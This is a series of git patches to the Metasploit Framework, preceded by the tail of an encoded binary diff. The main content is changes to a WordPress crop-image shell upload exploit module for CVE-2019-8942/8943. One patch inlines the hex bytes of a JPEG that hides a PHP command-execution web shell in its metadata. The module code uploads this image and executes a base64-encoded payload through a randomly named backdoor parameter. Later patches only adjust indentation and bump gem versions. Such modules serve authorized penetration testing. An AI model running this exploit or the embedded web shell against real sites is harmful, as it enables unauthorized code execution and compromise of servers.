zteeVXGTX{58RsQGTC)Q*_~Ie;{-ZNYmruTQ;v5x6LstgdS(A<uOi>TGJfZtkdrq3a
z!iMo3`ce{gQ;kWB7zO#QKiU2})SiqG0U^eyx{ojXK>WYqWLMHN35(5-orOLexKpOA
z#U(;~TmPkZ`%732UfKR>&}<GeBp^zA>O$-cqOwvY)NCJK14!5o#d!6i+ZM{0CtQs1
z)tD^kZ5?k#u-$cTR5MDbMJ79c8@pc`6r_k|TvggI$S6T(Vxh7uGq3t+WLS2k615#4
zNAQydpKZ?P!8v##!XYFBg$r=_HLU%(W%%L<s>T3Hym#XK8VjSd1iodQ7}sIs4=PZh
z5-80lyw}waQu?o@O1vDjZbXYw{$Y+VgYn*Hqx7=!BrFyy;Q1nb=kLhShYV24(S>SE
z^lY-CM|3v$aiXVb*6A4)&j=cUlM$9^W!;JAExv!pB)1`|eJvG0f37Wi9#GyCg-yez
zmkUI&@yG7hAFu1xW{XAu+qzWvD^J{Z{%|n+tj&^~p~-UuCA%TM9xYH~O1u+L29jAw
zg_%krP}vjSw0F>Yyat0TL`B!Gss07=%vx3Uv}ryL5h$vg$Szr9VQ+1o54@zcclm-Z
z?y(d1Zc8TL(5_ZM>8dD@gRh=r1Jgdc=psl2TS;dO2+Y~Nd5{>o$&j_5^bH+MOg?i_
zSWDGSZX+y!Z=CWF1SXzV)r=s5K}z4$H-q!<(2a>489i32jB_3Dgh0cj0iEMj!8n)@
z*x2MmG9ntQ@&X28=tM=pgc_50fma|em&1TtV^cdf7@*XSooTH)NVYLQCWl*eDB`X~
z9x~KOzd$((2hwB=mKxJH^`yq#Fi$dq2*ZwFJ@+iJ-+0Ra7%oqb<~tka=b@!gcI}k4
zgC2;FjkHc4i81FsaEhmWDOz~g(s_2@ByC|ANrz9Et1fjVZS?SIvaLt%rBOBr@N!C7
zNnr5JUTk3YFn`!qEL8yu;rpCfIyr<id|Jh14+dF7VpgP^O+g!JwdAqPx}=1&aG~ik
zWvGf#u+{Zc&hDoL`yZP3UmB8Z81|_Tc-Az?uCqPb4;hKu1l0f-%iR0lm*L7CaH)*%
zRz_$`h(_8fMLXk$^2ypa^`FKQ`%jNZz-gDJJpN!k%n!Bdl&3*VWQYR&9PLeh=Ct4d
zQFrxb2K5T+k#W&z(e7Qd8$OeAl99T3Kj+p}8s@Ah!UH|2uXL1#uJR$?I7s&T?;NNc
zO5nhYxk)XOYo(Vz7@KpYx}}kB4`c~G`B{Ip#S+s!HVpyo3*3<KxQK;?j#yDG5NTT-
z#(oUu`x5jIjsIr5&#T`7EhVtQnw{IV1Jn-Q$7$7l(QsOu)TVV}4&FW(E3$+l7_#my
zZ(E@?hl_I~*VR9yycYP^Bw9kX(wPu;g1`RV>qq+RdIQIzY3xz-S=F4g@2?Fsl-jb`
zOYl|p!4xcLe4pXW`K7NO(AP9O+lib>CnX|?vbR+lY)z<$_*2D`U!IZn)<y)s>ybF2
zuPkJU8Y5zVow`uP_-iv99P{kmBC3El^u*t}c2zJjJL#dHhH^g4|Cv7__|^ef!{$Z>
z!tefOZl}e3RW2D#bR2aqP8w{{V!&dyvZ}q^_|CV{hxH?vevWavl5L!?#>h@l(eUb=
z&;3MuVT-Iwsm8o7U`)6eT}H%WUFlKlXvTO|NMNc7UN}e%g*B#H3fe{Y_VX7b4Wfdv
zMv%<T@vAEQE4QBLddn#a9wB~_m7V^cA3tWVMTb{}1fQG8(5vnj;}VY$#Gl@7Nn`n1
zO_~U8-Zf@xvC~f9dfN$!#4oHg{u=2pWK+?KMSh(%ZM*lB8Y5Z#Qu2i$r?P<6^6$yu
z|MaqskwWwprwVY=0)f(G#f6f{Ri;)0&c{1BvTXlB6bbbhZ%okH?*mohL0|6OUl{Si
z5~k><<FJD0>xjXBy5~O6$EYz^5-rpi!HK$p&+iF*BNO`KnYU`paQnS<AxFtukoE9y
zk2u9R`KRHcrpDWy?3v~C;((0q_n9}eLaCVsFR0O$ww=0hPyEDKw~1;PXoJ+06JDJ;
zG+9#b{x1TJfx-7bV0@YRPminvo=zFtSL5_(dTdN~KiU+^bgKd%hysKm8OcPKo%_ro
zg=nPfix%9lF{SvTNikN@j1Jp+<vnFI{ZhwIDr~~03+1x~ym~w7b2Qq;X@ha&c7cB)
zWE4S+v{t=}IneYz56*4UV=>r(_PecI_Q!S<4cH{L;4}iIIR&!%1M41YlfQQKUd_F}
z%rv2_LU?^Wta(7#Q)}B^4S09!pV|>gl%Kyy_LZzYWUNn{c36m~?ulW<*0f(H$^%z4
zh4rS<@y6+7th|ZL*U1J_6=p_?-o4{nPM#Ld??=0CD0xazVG+!;%5Ztn6#ZhsxAl)!
zyhCn~gi7?68kD_61giBl&YR#UP;P3>@zQs2nue+(vBsb&Ci&TBnIm6^4jB>T6JC!Z
zuceuwlGkR&a}zK{?^@t*_=654va$tYzjNUXp5*cmoqy-HDOTbHo0x+ki>(;0Jo4Gd
zFi(wflR@Ga-}w6vmar+xMs!?_DXn<cJsOXCtN!~{zKf^U<=~0xj;0D(c)$DN?bDJG
zrFSkpn(+n^M@p5}Jagm<nFAz6&ce458fpiLAB;V^5)hf6VwZH|K+Ns)%&se7RlPgd
zUxHs%F=vk^YxIxQRCbqaS==H_CcU;W`=WsEhYTa*=~(1@tgJqgawpme7aA*auwjqj
z2`N(<H~v_Rzwn6W*ugrRAMtFUjV4xOG$B6mnwxQP!0bTK`9T;Kx$P=kd||uny`5if
zwwHzlpYhIZUVQ&B*B2eg^L67dI_9lEZh5)-!MH4z2pB!aZedW3Q6z+W9CQWBorYYU
z!=h!KtgP^;_`c}YZwGCTk^O{n#^jWx^yIgPmbB2WQs1shF&`Rql-Lq30&nZtLW~bO
zOnCXuSYccJJwz*PKF595?|ojb%}ptw%uA&koIi=gA?yl$8aD}xDqkeHHDA&?@KBz6
zeagp_4m?R{evN7k(k~neG4hid;UthijhX5mC|l=nkc7U1z}y*B+Y)WCkPdg^vLV^j
z#ZbxtGWpxJ6S<z?<~gjS78He2F226iIe^;fCPILEk?<t!9V5eMQbW)kQNVwWp#hOu
zZEO~us{4ZM-SRNK#3(5@7-rHCe`WaX5|s_zLe)GXg+Bjk7zy2t*1ja9(jE4yG2mJs
z4hZ6Gm;oxL12o&-{acY<#nzFX*QvC>jws`U8OB^m7wECy%X~WKEmUPgYRn4ir{1%G
zaS29vfodmF=vJ9<#ySvELbHWMyZzfXrWx0T)wPeSDy2Z+jl6I>>tP?F73-f~Z=TyC
zd1XGowK_7ZzRf`&sKZy?2K5?THO8qjx$UI9WAn?T;)`9S4*A@LpB6!7uFAKEQbHvc
z9h7k|C(w74q9q|J2R|*!Cb>qSY#+@&*%_3!l5<a7FhqKu_w=bz5t2zQ$n7v1xNR(U
z>$+`!_S3VMJ--Mj5h0@P-q339`*mCAw|&^<_F#A)pfKwFMfueIPYlFAUD!*GGS0k~
zG|-~La=gw|Yz0<!Z^^x+CO6;oG$iCyyPF6sQ+~Mpv$E48sdsz+6t)<We2!$hspd+F
zXPoW>l@j)`Nsp&!9!Un-LaRc%6It&o^PZlA<P+KjV4hxP_B4NTdn(}cO@M90-GXW0
zb%1dNT=vf%v!*9N|1Q8L&;oX>F#i1h!Ks19n<z02D~1G-ZOon!(7cfBS0y&4<QqCM
z3?2<pOwG}jfz{x0z$uP#`%XTWYK>>&UU9Ipsi1dndcmv$1k*GLn?><(d&hJl@g0=x
z1v?3P>NVZa^kgbz4B+wS*Wm1u>%==XczL3e<9Fw#%A^*d9G-^cO*i|mrY{7Oj1f;Y
zW`upuY@Og?So1J4ngmF6*|r-eXI<{*8K;fmb@ZD7X}?+Q&2+tyKCu1*8Qu4NzOgP@
z0K6lDD8}G!hGYc9dAcmN=l5HR0WM9MGLmicy@{W>H55<U%aNmBOAb|$j2zZh+I>2K
z?;c4!P(?0-xmMDF{UXEC=vq+UO+j8kZrI5gAdWZ&4HqvC3KflsYRo%OIct{3p=DgW
zT#c#so{s$q5%<pkWk?2Z*yzJig?gNHVLl>8XQJ{@hV8?^g(%n*U8U$vc~F2u-sSIj
z+!V^aNe;{h%$-XO51g~!U?9u(z8sP4*jq{>#x&mi4-98@zgfI@v8L0UgA`EoWhi35
z_MFJY<DPw4#BTlq!GtdYg!#F6<@bhaAQw2f*?yNNdV3X*;)E@bYTfR7gLi*;bA(6^
zHwh9LAO_tD)+eQYZhQ+vS7~EU2bB`)fK@FExva*#Jqx3y!@~fE{jwOs39u0m%|=_`
z!x<9ZmPHd0H#(^wZv#);Gv~MB9~FpqzLcl+*j)*Q1rcb~xu2|Qm7p3R<L^cNz(e?(
z6&fo>?&UdI+6d<VxP~gCOB5GcU5)g(KkbUU4tLtrjG!ak@l(5$ft$s@CUXHhiXT09
zp38RYGa8{oBHQZ|uLeEw`hBX}FJbboMfTd^N9o-=9(8W0ly4ezz})~<P{3XMl<`C}
ztFpX>j8(0J5}!(Sl?1V_q$|d~`^u+b8aI((*SiRP&JDOSmAWzF*4s7z^y%33s1ml)
z+p^EUH;OJaFET+_J}8UGe3H;!mZk-dzbuWq&{YbJ4A%|ND&(Ne@SNjSe_i#q$CbBe
zg%3GK7aXY{;fZvTK~1?`D7cM!;JsbupCp0Mty*g;B~u-D<caS8aKa_*?iM}w%7z*s
zKtdhV7)(s1*FkvxLlFt!IHhcV+ToAyY=_!ny(qBK?AnCpNxBm@ovg(W=>zBT<y=v%
z5llh1@dJ(?1y+xuSDQ%rYUO)1tbcpvrLDxtQGxeX*Iu#{wh!R<-=TtRgS{N*M4~aG
zi(=xcV8wiwyL$_;8|=mrsTW<A9;JDx-^(ck*p{*W%GKtu$5&Q}zjh^YN?!``@*-0n
z?Y=-{(O<IM|K`Mm=&Qg=hURe|KW>|i+R@O3i}hnOP$g})?9|7wA_pDGXqOF}i54tQ
z-N|%JcBrR2fGtDdPRil)O_8MAW>Y^sW{(UzU{M9&nOGOo{C4Dp&??LNbhYwV%BBI{
zZk|$TTkhFwr&;-_BscN28Z+DK<b532!fcZ)^6-w~c%)VLn3kkeu^T%Z{53a&r22J6
zSGozB{ZKWAZZEH?@1_e7f1Xb_2wu~(>Dq$Ci%N&S$EFDTweygwsmYswR%(<=!B6b$
z+qTZ(Zwbkdo^u{6a{lo!Y)H!I2&bh--P{iD_KPsS)v&K0FB}+Z!L4TqT6;_T7kR(d
z(%KS-A?DfD?>T#QHjj_(Dq4(udr`%`uj0w3#tCt~M>VX{J{#)Za<Ch3k;o>%>>S7P
z)SC|V9FS+B!q5iIMZbk9arF>q?6jDz_;iX+cwEz+X3RSAo&68?YPr(B=}y!TL>nXZ
zFxRkbapz)1kP(x+&gv(FD~Zp8D2G3zlG2l>qT8g(dMk84Od*5u`X3OI)rSmErSalo
zGMJTORs=2HZrsF0%VZ42wopT(0vwx(jBZeEKqHDNR+s%JowcXSz&0jZK3^Oazf<SO
zz#XH;fJ(im#uNwVXZ~6Zx@n7&H!>x^%m@i4p<pNNm0Mv-f^VUAitw-Y>ORp3jYj|~
zNc((6*9bD2;n$dnq8vCi?pd`Ym(I7;r!96ZCQqC_5uz1kbkGPVKqE@swa@;iBIq!1
zNpc1~Ia;70p|a;C7XCHm<r0xitsyi!npYd;^o`v)A~8yW#dRNo3xRorHgqj^AsO~N
zH0N9?*!sV&{EodY_Ssidr?UE^I?>5LX&HO&S<!jB^QO(!$|GPOnD;VTjrq%W@C`Q2
zBjA<2l1UR?(0uq>jRBSDCd~`kV#=uN8vU`9j{np-K;v0qGdKXhS|sw~%rmMD&x9FZ
z>Gj@Ii=THemZYd_y;?wkG7U{|QoXWshhJHw*FW>dj}?HS1FOXLFqzsxU5Gb}VM~4d
z0Cd})AAr6$MrvFz%Lys^ukS1ZZ1)diI5OkyALon?&JUT0h9SNeSXpU*-L4J0@FB*1
zBZ(|G!fbfsD>Wwf#{~#X?}WeFS><ps4J_#8TA|aU=gspoP?M_+=xoPtUGCMjugkW+
zPK4%@27&7{biF^Q`euhb+h4v=Y>5|TrIvrSj`5T+rVLVQzlZaa^wUYWq@HZru($%|
zG%{EeWt=xIvK!3UevM$={~3&}3Let&;+W<WgHSgyG^?OX27ErTJ5)R!NO3u{sOW*G
z!)2*1D3#A831+^j1mneTxG!O}I~_m><^qrbtimxjHKDfy5wBxKwhWP*%hlPYgXEr3
z^TS;WZi9lU^AD+)Lqoooovx+HQfEIM6|6miSfjQm;RDmb%wqUCTq(kV6(YHDcjTnH
zyl@&exu*Ih&`-%Ts=5?#@WquVxh^tF?zXPioq<^NXJ@B>^;0!D6B-Z8eZ01Dy^&HS
za)rS}g~5UV^a9MJ*U&b44F<AVi3C%B+3r{74=;O#*a4yHV}L#P$#5hMbq9ePJnoKm
z(rb&oLfP!PHsY=mW2l9Yl(I95b43EYcbiZb&r^wGgt=N9HbB|k@)Dyf$+B4g)RZ!k
zMjAE^*rVd!gTo&_JFJUudsR<|OxtcRc9zIpli*wrFFaeB;yC_mO;>cSZZa=na?Qaj
zpK_#zILRn_q?Br}*;te9Q;pIn`e{}%oTBaD9iIJwdl&#l(JIH+bc69~V6nqrB70cn
z%-6Nblfb24fS7p02Yb3%<||9C8(kCNY6deK#48_oyM7jU;8Jf)Ti+Eocl=9B6{r7*
z9`nr7?%0JSRxLyY^YH=UGda_)11(KH`?@+FwH+<J|CsBW-6I4-JWbg9B)B&lq_4EA
zQNa-LEv9(JyV~jX*KkM1EGBu=DHD8>sv`e-4w~WSzyHsh12Q5j8Q_0~r5ZEC;Gsk3
z+zQV|_h+A#ZYd^8I;-Y}PKk`?LoY;LPgr2grxa&g09D4bnA(3j=N!kS27u9BAIuup
z>zte;`4`z#ePyOW^2HKW+2UehNM(F{Iz$<BJ(=|(>pA`)gNX=~aFe%fLIR7yk{ZxE
zqPG-sG}3>xzA3O<ze`D4T%@Tn4@#+@I}iKY7kE;MbDacaDbscfA-PQoHKZ`UW*M}{
zx6$jmgah`<y2r_f7wS%C`=@)5Cw}m=<B>kN<Apfg^ZjXI+F_R?-$sgb_Dz~)Kk4k?
zZI1am<1X`fLdK)7N}LQsHIYg>%&GUY%y_GDSmj*mWj_{^&EmLbqY8p4S29Wv!P=4g
zyNq;bZFI<_HX-<2r;b1g#J4i#(be!%2duM+!#hVGl+OuF+Y4C^#{Jic++=i#huzi+
z`j}8xG8H(n>6G1UeaNc5ViwPcZorKDVTHV6?uy?P6-?sewL>+4MV#9LtkhaPvG#W1
zL8@Em0G!h@h6kReo)bwwQ=@N2^+Wrz&s}tH(SifO43oV0^+gfzOFJR5HM_-Y{Mc2?
zD_|A=lf_PVC3T9NaCAPwWbNIl-<WdU8sO5o&iq|dPHO{1fPK&S`dh%mVCDt-K-{Q<
zc_}C`H{<>_zaZZ~Q)r_B`Q8uL<T52AKw&MSF6R~`{Qd#Zc=k6}V=og-9EH&*sQRio
zsllr!mbsy=J`?Q`^a#;)U=!T9f!7NnY-@Za&-Qk$B@XqL5QZ%D3e%l~k|wSCN7t7)
z?>AKO_zuFJ%bz|1VtV$k$Q5@MW&u3v19<*=bHvH1E$>`Aos?`-ZrSn9IWce|&VQ`n
z<(Jd@3G?A#;*OYMu}x8BWJm4yvi{3bh~ia`WWCQcRsz!)Z`(??WjlW=5x%Bz=~e?3
z7ez2tFB%CM<|Z5+Xp;iU63i7H#csV0Jmh|Zo#)nHjoG=PjSPdP?wWGhvsqZS{Pu7)
z$TCG=Y(R2cysg((h*gGfzWuMLhD_UQx^CHlK46wRl~`@aI;NkdZ2eid%ym*>y&vj1
zkLxK>vFB4bQ*~*XN}fs0I^uiya;-$gt35B?wqtkK_A;$UE#uWdAky7Z+#^uIbc=qv
zyPeKroU+iS_CU_gWwyI6&f3>M48@P(eSVtNa8Hz-lj;JT1iCBO@uc~E0Q6$^aB-2v
zXzh>f&Jx|-ga}Jdz0MMLWgaq)ETl|kZ~V^t4CeaewqnAXZw+1z{%PJR!nw$6MCpgx
z$@b=NcP^YZn_?e;i~$8TOeG|@)dJMw!Vr=>eT+EN^BZiAX1JWP`{wA8Q5PoL?go9M
zQyJ6e#~YGeYb7E>Rjq;M@YHngVK7v(0Et!2m~oxNM%M9EU50X=XOa2#RMz{adR0J7
z7^>#_B#`XD`+K-l2n>e+ljMot0}nov8tF>EM8>x#j*TPB+Gu{ihpn4ElSkTfJXL9T
zN%g!SxO(AKw@yPvpUENKXu#jD7S28*rvP9k)ENBPTgK{xDBio76pFEe&Bs?PYPo5U
zec^)*{-5>BNE;j)r7w7oW3$F!uH(Jm%0aG^dglMi<D_8IFG0xnAmqb6va#5Xr;p5f
zYrQ9KwwV~ox9W8%T67c{&)uIHE#BTGg2wp-<(HoFtma3K$AThWTrCHpo<W7gw+Yo%
z|MSlWMfdi1M_hNedj~f4A}1?{t_}|%ewV&w*f-W)gPA3}yiLRiQ2_*G;?>u-2KZjx
z`graOMSdpf2Ea|}FR_ArE?RneigIT5AO&L9DCfBrsR7mho-s2ZnONFI{?i?+=@6pi
zM$QzAW`qeg%==(qsuNTOfd1%C#v%&_M%0{(l9t`8QLUOTxQCkU=j>nTb+Kg(4y{ja
zv<k^(PuavlgH55b?6uXk55Ti5-~#1tnuCH(oAXq;K3a=uLcEZNomHju;%7I^9EQ8B
zq-Bf8OLf4bLtx7a^cl~a4V!8n{P2K4sZ8eW+ti{XjzfQm$>7My=&Z~wIjC+PEz=9{
z@4aJYo%tA824DnPwk>wxYc5#p;+os2a@*M_8$(ZjJyLR9+^V$6_6y>y;O8l8Mx+K+
z@o!R7564QtZ8=s2hLFHNC6j(`a(uIIK*I`Un2%p$win}#_qKcQrlJC)d6n=;O2<TM
z2S-B{jb|gXuKi>GCCpZVRII0-?oE4im)~Q(gH7?G-S-fU5#~d$m6poRR|0KAA@2sZ
z`sB>R)U?B><TNBMKY5ax5vZ}5qpX?K4HU+T2t&QpVQtrU&hZGATV}=XwHwe+(+<Q&
z@E#XXeD&HIuE3L1&pQ9Eehn(h2`E27k?SE(4j8|=wsX80gVXE|5iZer-t1D?1^rg;
zg4MkgC42t+S;~z-@Yu&@YN)Mmei_Nv7;IhY%M332bs9f&x<8s|IhA-eVCvzgI3v;D
isRLa0>meO06`!SfpfV%F$xqnctqmtVi`T@e`~C+VRlUCe

diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb
index 86a3eef3db..b01b8a9a9d 100644
--- a/modules/exploits/multi/http/wp_crop_rce.rb
+++ b/modules/exploits/multi/http/wp_crop_rce.rb
@@ -132,9 +132,39 @@ class MetasploitModule < Msf::Exploit::Remote
     a_nonce
   end
 
-  def upload_file(tmp_filename, img_name, wp_nonce, cookie)
-    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8942", tmp_filename)
-    img_data = File.read(path)
+  def upload_file(img_name, wp_nonce, cookie)
+    img_data = %w[
+      FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 60 00 60 00 00 FF ED 00 38 50 68 6F
+      74 6F 73 68 6F 70 20 33 2E 30 00 38 42 49 4D 04 04 00 00 00 00 00 1C 1C 02 74 00
+      10 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B 3F 3E 1C 02 00 00 02 00 04 FF FE 00
+      3B 43 52 45 41 54 4F 52 3A 20 67 64 2D 6A 70 65 67 20 76 31 2E 30 20 28 75 73 69
+      6E 67 20 49 4A 47 20 4A 50 45 47 20 76 38 30 29 2C 20 71 75 61 6C 69 74 79 20 3D
+      20 38 32 0A FF DB 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0E 09 09
+      08 08 09 12 0D 0D 0A 0E 15 12 16 16 15 12 14 14 17 1A 21 1C 17 18 1F 19 14 14 1D
+      27 1D 1F 22 23 25 25 25 16 1C 29 2C 28 24 2B 21 24 25 24 FF DB 00 43 01 06 06 06
+      09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24
+      24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24
+      24 24 24 24 24 24 24 FF C0 00 11 08 00 C0 01 06 03 01 22 00 02 11 01 03 11 01 FF
+      C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06
+      07 08 09 0A 0B FF C4 00 B5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7D 01
+      02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 A1 08 23 42 B1 C1
+      15 52 D1 F0 24 33 62 72 82 09 0A 16 17 18 19 1A 25 26 27 28 29 2A 34 35 36 37 38
+      39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A 73
+      74 75 76 77 78 79 7A 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2 A3 A4
+      A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2 D3 D4
+      D5 D6 D7 D8 D9 DA E1 E2 E3 E4 E5 E6 E7 E8 E9 EA F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FF
+      C4 00 1F 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06
+      07 08 09 0A 0B FF C4 00 B5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00
+      01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 A1 B1 C1 09
+      23 33 52 F0 15 62 72 D1 0A 16 24 34 E1 25 F1 17 18 19 1A 26 27 28 29 2A 35 36 37
+      38 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A
+      73 74 75 76 77 78 79 7A 82 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2
+      A3 A4 A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2
+      D3 D4 D5 D6 D7 D8 D9 DA E2 E3 E4 E5 E6 E7 E8 E9 EA F2 F3 F4 F5 F6 F7 F8 F9 FA FF
+      DA 00 0C 03 01 00 02 11 03 11 00 3F 00 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B
+      3F 3E
+    ]
+    img_data = [img_data.join].pack('H*')
     img_name += '.jpg'
 
     boundary = "#{rand_text_alphanumeric(rand(10) + 5)}"
@@ -357,11 +387,10 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Preparing payload...")
     @current_theme = get_current_theme
     wp_nonce = get_wpnonce(cookie)
-    tmp_filename = "evilshell.jpg"
     @current_date = Time.now.strftime("%Y/%m/")
 
     img_name = Rex::Text.rand_text_alpha(10)
-    @filename1, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie)
+    @filename1, image_id, update_nonce = upload_file(img_name, wp_nonce, cookie)
     ajax_nonce = get_ajaxnonce(cookie)
 
     @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie)

From d5ac1e3a334232ec0f35e8afc55bf0c86de2303d Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Wed, 3 Apr 2019 19:03:47 -0500
Subject: [PATCH 11/16] minor adjustments to indentation and requests

---
 modules/exploits/multi/http/wp_crop_rce.rb | 76 +++++++++++-----------
 1 file changed, 38 insertions(+), 38 deletions(-)

diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb
index b01b8a9a9d..610a60ce41 100644
--- a/modules/exploits/multi/http/wp_crop_rce.rb
+++ b/modules/exploits/multi/http/wp_crop_rce.rb
@@ -10,42 +10,42 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HTTP::Wordpress
 
   def initialize(info = {})
-  super(update_info(
-    info,
-    'Name'            => 'WordPress Crop-image Shell Upload',
-    'Description'     => %q{
-        This module exploits a path traversal and a local file inclusion
-        vulnerability on WordPress versions 5.0.0 and <= 4.9.8.
-        The crop-image function allows a user, with at least author privileges,
-        to resize an image and perform a path traversal by changing the _wp_attached_file
-        reference during the upload. The second part of the exploit will include
-        this image in the current theme by changing the _wp_page_template attribute
-        when creating a post.
-    },
-    'License'         => MSF_LICENSE,
-    'Author'          =>
-    [
-      'RIPSTECH Technology',                               # Discovery
-      'Wilfried Becard <wilfried.becard@synacktiv.com>'    # Metasploit module
-    ],
-  'References'      =>
-    [
-      [ 'CVE', '2019-8942' ],
-      [ 'CVE', '2019-8943' ],
-      [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']
-    ],
-    'DisclosureDate'  => 'Feb 19 2019',
-    'Platform'        => 'php',
-    'Arch'            => ARCH_PHP,
-    'Targets'         => [['WordPress', {}]],
-    'DefaultTarget'   => 0
-  ))
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Crop-image Shell Upload',
+      'Description'     => %q{
+          This module exploits a path traversal and a local file inclusion
+          vulnerability on WordPress versions 5.0.0 and <= 4.9.8.
+          The crop-image function allows a user, with at least author privileges,
+          to resize an image and perform a path traversal by changing the _wp_attached_file
+          reference during the upload. The second part of the exploit will include
+          this image in the current theme by changing the _wp_page_template attribute
+          when creating a post.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+      [
+        'RIPSTECH Technology',                               # Discovery
+        'Wilfried Becard <wilfried.becard@synacktiv.com>'    # Metasploit module
+      ],
+    'References'      =>
+      [
+        [ 'CVE', '2019-8942' ],
+        [ 'CVE', '2019-8943' ],
+        [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']
+      ],
+      'DisclosureDate'  => 'Feb 19 2019',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress', {}]],
+      'DefaultTarget'   => 0
+    ))
 
-  register_options(
-    [
-      OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
-      OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
-    ])
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+      ])
   end
 
   def check
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_current_theme
     uri = normalize_uri(datastore['TARGETURI'])
-    res = send_request_cgi(
+    res = send_request_cgi!(
       'method'    => 'GET',
       'uri'       => uri
     )
@@ -408,7 +408,7 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = normalize_uri(datastore['TARGETURI'])
     # Test if base64 is on target
     test_string = 'YmFzZTY0c3BvdHRlZAo='
-    res = send_request_cgi(
+    res = send_request_cgi!(
       'method'   => 'GET',
       'uri'      => uri,
       'cookie' => cookie,
@@ -422,7 +422,7 @@ class MetasploitModule < Msf::Exploit::Remote
         # Execute payload with base64 decode
         @backdoor = Rex::Text.rand_text_alpha(10)
         encoded = Rex::Text.encode_base64(payload.encoded)
-        res = send_request_cgi(
+        res = send_request_cgi!(
           'method'   => 'GET',
           'uri'      => uri,
           'cookie' => cookie,

From 2710c422c255fcdfdf0feeb748e78150c7288353 Mon Sep 17 00:00:00 2001
From: Metasploit <metasploit@rapid7.com>
Date: Thu, 4 Apr 2019 10:08:31 -0700
Subject: [PATCH 12/16] Bump version of framework to 5.0.16

---
 Gemfile.lock                        | 8 ++++----
 LICENSE_GEMS                        | 8 ++++----
 lib/metasploit/framework/version.rb | 2 +-
 3 files changed, 9 insertions(+), 9 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 87fb2a2476..775b0ea144 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.15)
+    metasploit-framework (5.0.16)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -113,7 +113,7 @@ GEM
       activerecord (>= 3.1.0, < 6)
     backports (3.12.0)
     bcrypt (3.1.12)
-    bcrypt_pbkdf (1.0.0)
+    bcrypt_pbkdf (1.0.1)
     bindata (2.4.4)
     bit-struct (0.16)
     builder (3.2.3)
@@ -201,7 +201,7 @@ GEM
     nexpose (7.2.1)
     nokogiri (1.10.2)
       mini_portile2 (~> 2.4.0)
-    octokit (4.13.0)
+    octokit (4.14.0)
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.2)
     openvas-omp (0.0.4)
@@ -361,7 +361,7 @@ GEM
       activemodel (>= 4.2.7)
       activesupport (>= 4.2.7)
     xmlrpc (0.3.0)
-    yard (0.9.18)
+    yard (0.9.19)
 
 PLATFORMS
   ruby
diff --git a/LICENSE_GEMS b/LICENSE_GEMS
index e64c967c75..f1038a5cb9 100644
--- a/LICENSE_GEMS
+++ b/LICENSE_GEMS
@@ -11,7 +11,7 @@ arel, 6.0.4, MIT
 arel-helpers, 2.8.0, MIT
 backports, 3.12.0, MIT
 bcrypt, 3.1.12, MIT
-bcrypt_pbkdf, 1.0.0, MIT
+bcrypt_pbkdf, 1.0.1, MIT
 bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
 builder, 3.2.3, MIT
@@ -44,7 +44,7 @@ loofah, 2.2.3, MIT
 metasm, 1.0.3, LGPL
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.3, "New BSD"
-metasploit-framework, 5.0.15, "New BSD"
+metasploit-framework, 5.0.16, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
 metasploit-payloads, 1.3.65, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.8, "New BSD"
@@ -60,7 +60,7 @@ net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
